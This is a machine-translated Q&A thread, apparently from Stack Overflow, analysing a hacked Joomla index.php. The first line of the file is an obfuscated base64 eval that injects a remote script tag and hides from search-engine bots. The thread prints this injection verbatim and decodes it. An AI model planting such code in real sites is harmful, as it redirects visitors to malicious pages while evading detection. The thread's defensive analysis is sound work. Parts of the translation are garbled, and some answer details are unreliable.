我的客户的网站被黑了,现在主网址重定向到虚假的防病毒网页。所以现在她已经与Joomla建立了“正在进行中的建设”的信息。下面是index.php页面的代码,我希望在其中找到该死的重定向。但我不能。任何人都可以帮我找到它吗?
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXskR0xPQkFMU1snbXJfbm8nXT0xO2lmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXtmdW5jdGlvbiBnbWwoKXtpZiAoIXN0cmlzdHIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdLCJnb29nbGVib3QiKSYmKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpe3JldHVybiBiYXNlNjRfZGVjb2RlKCJQSE5qY21sd2RDQnpjbU05SW1oMGRIQTZMeTloWTNKdmMzTjFibWwyWlhKelpXbDBZbVZ2Y21jdVkyOXRMMjF0TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTt9cmV0dXJuICIiO319aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7JFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTskUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDtpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTskUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7fWlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7JFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7fWlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxO31pZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7fSRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpO2lmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7JFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDO31yZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mzt9fWZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREU9Z3pkZWNvZGUoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qik7aWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpO31lbHNle3JldHVybiAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFLmdtbCgpO319b2Jfc3RhcnQoJ21yb2JoJyk7fX0="));?><?php
/**
* @version $Id: index.php 6022 2006-12-18 22:30:07Z friesengeist $
* @package Joomla
* @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
// Set flag that this is a parent file
define( '_VALID_MOS', 1 );
// checks for configuration file, if none found loads installation page
if (!file_exists( 'configuration.php' ) || filesize( 'configuration.php' ) < 10) {
$self = rtrim( dirname( $_SERVER['PHP_SELF'] ), '/\\' ) . '/';
header("Location: http://" . $_SERVER['HTTP_HOST'] . $self . "installation/index.php" );
exit();
}
require( 'globals.php' );
require_once( 'configuration.php' );
// SSL check - $http_host returns <live site url>:<port number if it is 443>
$http_host = explode(':', $_SERVER['HTTP_HOST'] );
if( (!empty( $_SERVER['HTTPS'] ) && strtolower( $_SERVER['HTTPS'] ) != 'off' || isset( $http_host[1] ) && $http_host[1] == 443) && substr( $mosConfig_live_site, 0, 8 ) != 'https://' ) {
$mosConfig_live_site = 'https://'.substr( $mosConfig_live_site, 7 );
}
require_once( 'includes/joomla.php' );
//Installation sub folder check, removed for work with SVN
if (file_exists( 'installation/index.php' ) && $_VERSION->SVN == 0) {
define( '_INSTALL_CHECK', 1 );
include ( $mosConfig_absolute_path .'/offline.php');
exit();
}
// displays offline/maintanance page or bar
if ($mosConfig_offline == 1) {
require( $mosConfig_absolute_path .'/offline.php' );
}
// load system bot group
$_MAMBOTS->loadBotGroup( 'system' );
// trigger the onStart events
$_MAMBOTS->trigger( 'onStart' );
if (file_exists( $mosConfig_absolute_path .'/components/com_sef/sef.php' )) {
require_once( $mosConfig_absolute_path .'/components/com_sef/sef.php' );
} else {
require_once( $mosConfig_absolute_path .'/includes/sef.php' );
}
require_once( $mosConfig_absolute_path .'/includes/frontend.php' );
// retrieve some expected url (or form) arguments
$option = strval( strtolower( mosGetParam( $_REQUEST, 'option' ) ) );
$Itemid = intval( mosGetParam( $_REQUEST, 'Itemid', null ) );
if ($option == '') {
if ($Itemid) {
$query = "SELECT id, link"
. "\n FROM #__menu"
. "\n WHERE menutype = 'mainmenu'"
. "\n AND id = " . (int) $Itemid
. "\n AND published = 1"
;
$database->setQuery( $query );
} else {
$query = "SELECT id, link"
. "\n FROM #__menu"
. "\n WHERE menutype = 'mainmenu'"
. "\n AND published = 1"
. "\n ORDER BY parent, ordering"
;
$database->setQuery( $query, 0, 1 );
}
$menu = new mosMenu( $database );
if ($database->loadObject( $menu )) {
$Itemid = $menu->id;
}
$link = $menu->link;
if (($pos = strpos( $link, '?' )) !== false) {
$link = substr( $link, $pos+1 ). '&Itemid='.$Itemid;
}
parse_str( $link, $temp );
/** this is a patch, need to rework when globals are handled better */
foreach ($temp as $k=>$v) {
$GLOBALS[$k] = $v;
$_REQUEST[$k] = $v;
if ($k == 'option') {
$option = $v;
}
}
}
if ( !$Itemid ) {
// when no Itemid give a default value
$Itemid = 99999999;
}
// mainframe is an API workhorse, lots of 'core' interaction routines
$mainframe = new mosMainFrame( $database, $option, '.' );
$mainframe->initSession();
// trigger the onAfterStart events
$_MAMBOTS->trigger( 'onAfterStart' );
// checking if we can find the Itemid thru the content
if ( $option == 'com_content' && $Itemid === 0 ) {
$id = intval( mosGetParam( $_REQUEST, 'id', 0 ) );
$Itemid = $mainframe->getItemid( $id );
}
/** do we have a valid Itemid yet?? */
if ( $Itemid === 0 ) {
/** Nope, just use the homepage then. */
$query = "SELECT id"
. "\n FROM #__menu"
. "\n WHERE menutype = 'mainmenu'"
. "\n AND published = 1"
. "\n ORDER BY parent, ordering"
;
$database->setQuery( $query, 0, 1 );
$Itemid = $database->loadResult();
}
// patch to lessen the impact on templates
if ($option == 'search') {
$option = 'com_search';
}
// loads english language file by default
if ($mosConfig_lang=='') {
$mosConfig_lang = 'english';
}
include_once( $mosConfig_absolute_path .'/language/' . $mosConfig_lang . '.php' );
// frontend login & logout controls
$return = strval( mosGetParam( $_REQUEST, 'return', NULL ) );
$message = intval( mosGetParam( $_POST, 'message', 0 ) );
if ($option == 'login') {
$mainframe->login();
// JS Popup message
if ( $message ) {
?>
<script language="javascript" type="text/javascript">
<!--//
alert( "<?php echo addslashes( _LOGIN_SUCCESS ); ?>" );
//-->
</script>
<?php
}
if ( $return && !( strpos( $return, 'com_registration' ) || strpos( $return, 'com_login' ) ) ) {
// checks for the presence of a return url
// and ensures that this url is not the registration or login pages
// If a sessioncookie exists, redirect to the given page. Otherwise, take an extra round for a cookiecheck
if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
mosRedirect( $return );
} else {
mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $return ) );
}
} else {
// If a sessioncookie exists, redirect to the start page. Otherwise, take an extra round for a cookiecheck
if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
mosRedirect( $mosConfig_live_site .'/index.php' );
} else {
mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $mosConfig_live_site .'/index.php' ) );
}
}
} else if ($option == 'logout') {
$mainframe->logout();
// JS Popup message
if ( $message ) {
?>
<script language="javascript" type="text/javascript">
<!--//
alert( "<?php echo addslashes( _LOGOUT_SUCCESS ); ?>" );
//-->
</script>
<?php
}
if ( $return && !( strpos( $return, 'com_registration' ) || strpos( $return, 'com_login' ) ) ) {
// checks for the presence of a return url
// and ensures that this url is not the registration or logout pages
mosRedirect( $return );
} else {
mosRedirect( $mosConfig_live_site.'/index.php' );
}
} else if ($option == 'cookiecheck') {
// No cookie was set upon login. If it is set now, redirect to the given page. Otherwise, show error message.
if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
mosRedirect( $return );
} else {
mosErrorAlert( _ALERT_ENABLED );
}
}
/** get the information about the current user from the sessions table */
$my = $mainframe->getUser();
// detect first visit
$mainframe->detect();
// set for overlib check
$mainframe->set( 'loadOverlib', false );
$gid = intval( $my->gid );
// gets template for page
$cur_template = $mainframe->getTemplate();
/** temp fix - this feature is currently disabled */
/** @global A places to store information from processing of the component */
$_MOS_OPTION = array();
// precapture the output of the component
require_once( $mosConfig_absolute_path . '/editor/editor.php' );
ob_start();
if ($path = $mainframe->getPath( 'front' )) {
$task = strval( mosGetParam( $_REQUEST, 'task', '' ) );
$ret = mosMenuCheck( $Itemid, $option, $task, $gid );
if ($ret) {
require_once( $path );
} else {
mosNotAuth();
}
} else {
header( 'HTTP/1.0 404 Not Found' );
echo _NOT_EXIST;
}
$_MOS_OPTION['buffer'] = ob_get_contents();
ob_end_clean();
initGzip();
header( 'Expires: Mon, 26 Jul 1997 05:00:00 GMT' );
header( 'Last-Modified: ' . gmdate( 'D, d M Y H:i:s' ) . ' GMT' );
header( 'Cache-Control: no-store, no-cache, must-revalidate' );
header( 'Cache-Control: post-check=0, pre-check=0', false );
header( 'Pragma: no-cache' );
// display the offline alert if an admin is logged in
if (defined( '_ADMIN_OFFLINE' )) {
include( $mosConfig_absolute_path .'/offlinebar.php' );
}
// loads template file
if ( !file_exists( $mosConfig_absolute_path .'/templates/'. $cur_template .'/index.php' ) ) {
echo _TEMPLATE_WARN . $cur_template;
} else {
require_once( $mosConfig_absolute_path .'/templates/'. $cur_template .'/index.php' );
echo '<!-- '. time() .' -->';
}
// displays queries performed for page
if ($mosConfig_debug) {
echo $database->_ticker . ' queries executed';
echo '<pre>';
foreach ($database->_log as $k=>$sql) {
echo $k+1 . "\n" . $sql . '<hr />';
}
echo '</pre>';
}
doGzip();
?>
答案 0 :(得分:3)
exec(base64_decode())废话开头的那个位是你的目标。不是你的CMS的一部分,像地狱一样闷闷不乐。
删除它并高兴。然后更新Drupal实例,更改root和用户密码,并订阅Drupal dev的更新RSS,这样你就可以再次阻止这种情况发生。
答案 1 :(得分:2)
因此,假设您想了解单行如何工作,我去了decoded the base 64 string,它被评估为PHP代码。它提供以下代码
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){$GLOBALS['mr_no']=1;if(!function_exists('mrobh')){if(!function_exists('gml')){function gml(){if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&(!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9hY3Jvc3N1bml2ZXJzZWl0YmVvcmcuY29tL21tLnBocCI+PC9zY3JpcHQ+");}return "";}}if(!function_exists('gzdecode')){function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));$RBE4C4D037E939226F65812885A53DAD9=10;$RA3D52E52A48936CDE0F5356BB08652F2=0;if($R30B2AB8DC1496D06B230A71D8962AF5D&4){$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;}if($R30B2AB8DC1496D06B230A71D8962AF5D&8){$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;}if($R30B2AB8DC1496D06B230A71D8962AF5D&16){$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;}if($R30B2AB8DC1496D06B230A71D8962AF5D&2){$RBE4C4D037E939226F65812885A53DAD9+=2;}$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;}return $R034AE2AB94F99CC81B389A1822DA3353;}}function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){Header('Content-Encoding: none');$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);}else{return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();}}ob_start('mrobh');}}
从中删除所有空格,变量的名称如$RA179ABD3A7B9E28C369F7B59C51B81DE。稍微清理一下之后,代码如下所示:
<?php
if (function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
$GLOBALS['mr_no'] = 1;
if (!function_exists('mrobh')) {
if (!function_exists('gml')) {
function gml()
{
if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"], "yahoo"))) {
return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9hY3Jvc3N1bml2ZXJzZWl0YmVvcmcuY29tL21tLnBocCI+PC9zY3JpcHQ+");
}
return "";
}
}
if (!function_exists('gzdecode')) {
function gzdecode($encoded)
{
$bitmask = @ord(@substr($encoded, 3, 1));
$ten = 10;
$zero = 0;
if ($bitmask & 4) {
$temp = @unpack('v', substr($encoded, 10, 2));
$temp = $temp[1];
$ten += 2 + $temp;
}
if ($bitmask & 8) {
$ten = @strpos($encoded, chr(0) , $ten) + 1;
}
if ($bitmask & 16) {
$ten = @strpos($encoded, chr(0) , $ten) + 1;
}
if ($bitmask & 2) {
$ten+= 2;
}
$inflated = @gzinflate(@substr($encoded, $ten));
if ($inflated === FALSE) {
$inflated = $encoded;
}
return $inflated;
}
}
function mrobh($input)
{
Header('Content-Encoding: none');
$decoded = gzdecode($input);
if (preg_match('/\<\/body/si', $decoded)) {
return preg_replace('/(\<\/body[^\>]*\>)/si', gml() . "\n" . '$1', $decoded);
}
else {
return $decoded . gml();
}
}
ob_start('mrobh');
}
}
这些代码中有很多都是由守卫组成的:设置了一个全局代码,这样代码只执行一次,即使语句多次出现,也可以确保所有函数只被定义一次。< / p>
症结在最后一行:它使用ob_start函数来确保执行mrobh函数
当输出缓冲区被刷新(发送)或清理时(使用ob_flush(),ob_clean()或类似函数)或者在请求结束时将输出缓冲区刷新到浏览器时。
这意味着不是直接输出原始脚本的结果,而是将所有生成的输出缓冲并最后传递给mrobh。
请注意原始脚本如何以doGzip();结尾,因此mrobh函数接收的所有HTML都是gzip压缩的。因此,它需要做的第一件事是解码它,这是gzdecode函数的来源。之后$decode具有默认Joomla脚本的纯HTML输出,可能有{{ 1}}标记<html>和<head>。在这种情况下,还应该有<body>标记。在最后的</body>语句中,该结束标记由if函数的输出替换。该函数再次解码基数为64的字符串,结果为
gml()所以而不是
<script src="http://***URL censored***"></script>
输出的结尾现在看起来像
regular output...
</body>
</html>
以便在浏览器解析返回的HTML时加载该URL的脚本。
请注意, regular output...
<script src="http://***URL censored***"></script>
</body>
</html>
功能还有一个额外的保护措施,以确保每当谷歌或雅虎机器人访问该页面时,重定向都不会发生 - 这些搜索引擎会检测到恶意事件正在发生并发出警告用户(如果用户使用Chrome,甚至在实际访问该页面之前)。 gml中的else子句只是HTML不包含mrobh标记的另一个安全措施 - 在这种情况下,脚本标记只是附加在任何输出的末尾,假设浏览器将其呈现为HTML。
所以你最终得到的是你的常规页面,还有一个额外的脚本标签。 (联合国)幸运的是,它尝试加载JavaScript的域似乎不再存在,所以我们无法看到脚本的功能,但由于您说用户被重定向到您的站点之外,因此可以安全地假设它包含一些跟踪代码后跟
</body>TL; DR 第一行包含恶意代码,它巧妙地操纵您的页面输出以重定向用户(但不是任何搜索引擎机器人)。
解决方案:只需将整个第一行替换为原始window.location.href = "http://mymaliciouspage";
(您仍会在错误代码的末尾看到)并解决此问题(查看服务器)安全和更新Joomla,以避免再次被击中。)
答案 2 :(得分:1)
你被黑了。您不能再信任服务器上的任何代码了。核对它。重新部署当前版本。使用修补程序来修复安全漏洞,例如:将Joomla升级到其最新版本,并进行另一次部署。
只是编辑你的黑客代码库就会遇到麻烦。不要那样做。
安全问题仍然存在,您不知道服务器上还有其他什么。